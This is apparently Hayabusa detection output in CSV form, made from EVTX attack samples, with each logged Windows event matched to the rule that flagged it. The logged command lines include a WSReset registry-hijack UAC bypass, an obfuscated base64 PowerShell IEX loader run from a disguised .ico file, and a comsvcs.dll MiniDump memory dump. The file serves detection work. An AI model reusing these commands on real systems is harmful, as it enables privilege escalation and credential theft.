+2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WSReset.exe"" | Process: C:\Windows\System32\WSReset.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 56 | LID: 0x18d3b3 | PID: 2112 | PGUID: 747F3D96-B080-5D46-0000-0010D4EA0F04",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass WSReset,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\WSReset.exe"" | LID: 0x18d3b3 | PID: 820 | PGUID: 747F3D96-B091-5D46-0000-001081F71104",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,PrivEsc | Evas,Wsreset UAC Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wsreset_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,PrivEsc,Bypass UAC via WSReset.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:50.455 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe | LID: 0x18d3b3 | PID: 7792 | PGUID: 747F3D96-B092-5D46-0000-001089041204",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:55.299 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 1960 | PGUID: 747F3D96-B097-5D46-0000-0010E1321204",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:55.441 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\(Default): C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 1960 | PGUID: 747F3D96-B097-5D46-0000-0010E1321204,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:55.446 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d ""{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 3444 | PGUID: 747F3D96-B097-5D46-0000-0010E7381204",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:55.643 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\DelegateExecute: {4ED3A719-CEA8-4BD9-910D-E252F997AFC2} | Process: C:\Windows\system32\reg.exe | PID: 3444 | PGUID: 747F3D96-B097-5D46-0000-0010E7381204,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:55.712 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7588 | PGUID: 747F3D96-B07D-5D46-0000-00103C8C0F04,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: - | IP Addr: ::1 | LID: 0x38f87e | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx
+2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx
+2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,high,LatMov,Successful Overpass the Hash Attempt,,../hayabusa-rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx
+2019-08-14 20:53:29.688 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\explorer.exe"" shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x29126 | PID: 1052 | PGUID: 747F3D96-F639-5D53-0000-001067DA2600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 20:53:30.010 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x29126 | PID: 6000 | PGUID: 747F3D96-F639-5D53-0000-001092EE2600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""""" | Process: C:\Windows\System32\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | LID: 0x29126 | PID: 8180 | PGUID: 747F3D96-F639-5D53-0000-0010B0FC2600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Evas,FromBase64String Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,../hayabusa-rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x29126 | PID: 2476 | PGUID: 747F3D96-FBCA-5D53-0000-0010B8664100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""""" | Process: C:\Windows\System32\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | LID: 0x29126 | PID: 2876 | PGUID: 747F3D96-FBCA-5D53-0000-001036784100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious PowerShell Parent Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Evas,FromBase64String Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,../hayabusa-rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx
+2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cscript c:\ProgramData\memdump.vbs notepad.exe | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\cmd.exe | LID: 0xe81e5 | PID: 2576 | PGUID: 747F3D96-1C6F-5D69-0000-0010323C1F00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,high,Exec,WScript or CScript Dropper,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2576 | PGUID: 747F3D96-1C6F-5D69-0000-0010323C1F00 | Hash: SHA1=2E6A63BC5189CA5DF3E85CDF58593F3DF3935DE6,MD5=A081AAD3A296EB414CB6839B744C67C9,SHA256=3D77E7769CFC8B4A1098E9A1F2BDE4432A6A70253EA6C2A58C8F8403A9038288,IMPHASH=0D31E6D27B954AD879CB4DF742982F1A",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,info,Exec,WMI Modules Loaded,,../hayabusa-rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0xe81e5 | PID: 2888 | PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Evas | CredAccess,Process Dump via Comsvcs DLL,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:08.396 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\notepad.bin | Process: C:\Windows\system32\rundll32.exe | PID: 2888 | PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:08.439 +09:00,MSEDGEWIN10,10,high,,Process Access_Sysmon Alert,CredAccess - Memdump | Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2888 | Src PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00 | Tgt PID: 4868 | Tgt PGUID: 747F3D96-1C5C-5D69-0000-0010FEB71E00,../hayabusa-rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-09-01 20:54:22.450 +09:00,MSEDGEWIN10,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/spoolsample_5145.evtx
+2019-09-01 21:04:22.033 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:445 (MSEDGEWIN10) | Dst: 10.0.2.17:59767 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-98DD-5D69-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smb_bi_auth_conn_spoolsample.evtx
+2019-09-01 21:04:22.908 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:62733 (MSEDGEWIN10) | Dst: 10.0.2.17:445 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-98DD-5D69-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smb_bi_auth_conn_spoolsample.evtx
+2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49947 (MSEDGEWIN10) | Dst: 127.0.0.1:3389 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 3008 | PGUID: 747F3D96-48A4-5D6E-0000-001072958000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,high,LatMov,Suspicious Outbound RDP Connections,,../hayabusa-rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:3389 (MSEDGEWIN10) | Dst: 127.0.0.1:49947 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 8 | PGUID: 747F3D96-9874-5D6E-0000-0010C1C20000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49948 (MSEDGEWIN10) | Dst: 127.0.0.1:3389 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 3008 | PGUID: 747F3D96-48A4-5D6E-0000-001072958000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,high,LatMov,Suspicious Outbound RDP Connections,,../hayabusa-rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:04:58.463 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:3389 (MSEDGEWIN10) | Dst: 127.0.0.1:49948 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 8 | PGUID: 747F3D96-9874-5D6E-0000-0010C1C20000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:05:22.837 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.15:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:05:22.837 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.15:137 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:33:24.177 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49949 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 8892 | PGUID: 747F3D96-4F81-5D6E-0000-001001818B00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:33:24.177 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (MSEDGEWIN10) | Dst: 127.0.0.1:49949 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:34:37.129 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49950 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 8892 | PGUID: 747F3D96-4F81-5D6E-0000-001001818B00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:34:37.129 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (MSEDGEWIN10) | Dst: 127.0.0.1:49950 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
